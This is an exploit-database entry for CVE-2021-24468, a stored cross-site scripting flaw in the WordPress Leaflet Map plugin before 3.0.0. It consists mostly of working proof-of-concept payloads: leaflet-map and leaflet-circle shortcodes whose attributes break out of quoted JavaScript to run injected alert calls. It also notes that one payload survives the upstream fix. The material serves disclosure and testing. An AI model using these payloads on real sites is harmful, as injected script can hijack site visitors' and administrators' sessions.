Exploit for Leaflet Map < 3.0.0 - Contributor+ Stored XSS CVE-2021-24468

Name: Exploit for Leaflet Map < 3.0.0 - Contributor+ Stored XSS CVE-2021-24468
Rating: 5 (138 reviews)

2021-07-01 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:4B7C61DA-952C-492A-8CE6-3C2126942A7C
Most of the shortcode attributes are not escaped, so these are just one of them:

[leaflet-map lat="alert('lat')||37.4871" lng="alert('lng')||126.6794" tileurl="'+alert('tileurl');baseUrl='https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png" detect_retina="alert('detect_retina')" min_zoom="alert('min_zoom')||1" max_zoom="alert('max_zoom')||200" zoomControl="alert('zoomcontrol')" scrollWheel="alert('scrollWheel')||true" doubleClickZoom="alert('doubleClickZoom')" zoom="alert('zoom')||10" height='100px;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(String.fromCharCode(104,101,105,103,104,116))" data-x="']

Or,

[leaflet-circle fitbounds="0;});alert('fitbounds');(!function(){void 1" lat="0;});alert('lat');(!function(){void 1" lng="0;});alert('lng');(!function(){void 1" shape='});alert("shape")//' message='a']

After review of the updated changes (https://github.com/bozdoz/wp-plugin-leaflet-map/pull/138/files): [leaflet-circle shape='});alert("shape")//' message='a']